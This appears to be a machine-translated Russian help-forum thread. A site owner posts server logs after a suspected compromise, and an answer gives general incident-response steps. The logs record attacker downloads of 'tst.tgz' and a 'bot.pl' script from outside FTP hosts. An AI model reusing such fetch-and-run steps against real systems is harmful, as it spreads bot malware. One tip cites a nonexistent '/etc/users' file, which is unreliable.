Мой хостер сайта отключил мою учетную запись после того, как я превысил свою пропускную способность. Это было странно, так как сайт небольшой. Я начал просматривать журналы, и хотя я привык видеть попытки найти общие конечные точки, которых у меня нет, я увидел пару вещей, которые были очень тревожными. Первое:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 77597 100 77597 0 0 184k 0 --:--:-- --:--:-- --:--:-- 246k
--2019-10-13 11:49:21-- ftp://matei:*password*@tyger.ignorelist.com/tst.tgz
=> `tst.tgz'
Resolving tyger.ignorelist.com... 86.121.73.246
Connecting to tyger.ignorelist.com|86.121.73.246|:21... connected.
Logging in as matei ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE tst.tgz ... 21765
==> PASV ... done. ==> RETR tst.tgz ... done.
0K .......... .......... . 53.3K=0.4s
2019-10-13 11:49:23 (53.3 KB/s) - `tst.tgz' saved [21765]
и
Я никогда не видел таких вещей. Мне кажется, меня как-то захватили. Как это исправить?
curl: (7) couldn't connect to host
curl: (7) couldn't connect to host
Can't open perl script "bot.pl": No such file or directory
Can't open perl script "bot.pl": No such file or directory
sh: GET: command not found
sh: GET: command not found
--2019-10-15 22:14:04-- ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... --2019-10-15 22:14:04--
ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... failed: Connection refused.
failed: Connection refused.
решение1
Похоже, ваш компьютер Linux подвергся атаке через службу Apache.
Как это исправить?
Простого решения этой проблемы не существует, поскольку вам необходимо исследовать всю систему на предмет потенциальной уязвимости.
Вот несколько общих рекомендаций:
- Обновите Apache до последней версии (через
apt-get). - Обновите все свои пакеты (
sudo apt-get update). - Обновите все используемые вами веб-CMS/фреймворки (проверьте наличие известных уязвимостей).
- Просканируйте всю систему на наличие любых существующих уязвимостей (например, сканерами вредоносных программ, антивирусами).
- Просканируйте все ваши веб-сайты на наличие вредоносных программ и файлов шелл-кода.
Если вы используете PHP:
- Использоватьсканер безопасности PHP.
- ИспользоватьСканер вредоносного ПО для веб-сайтов на базе PHP.
- Если вы используете виртуальный хостинг, обратитесь в хостинговую компанию.
- Проверьте свою систему на наличие дополнительных неожиданных пользователей (
/etc/users) или файлов (например, в/tmp). Если вы подтвердили нарушение:
- Измените все предоставленные учетные данные (ключи доступа, пароли и т. д.).
- Сохраните все доказательства на случай, если они вам понадобятся (IP-адреса, журналы, зараженные/вредоносные файлы).
- После исправления ошибок в системах продолжайте следить за журналами на предмет возникновения подозрительной активности.
Если вы не уверены в вышеизложенном, обратитесь в ИТ-компанию, которая специализируется на этом.
Смотрите также: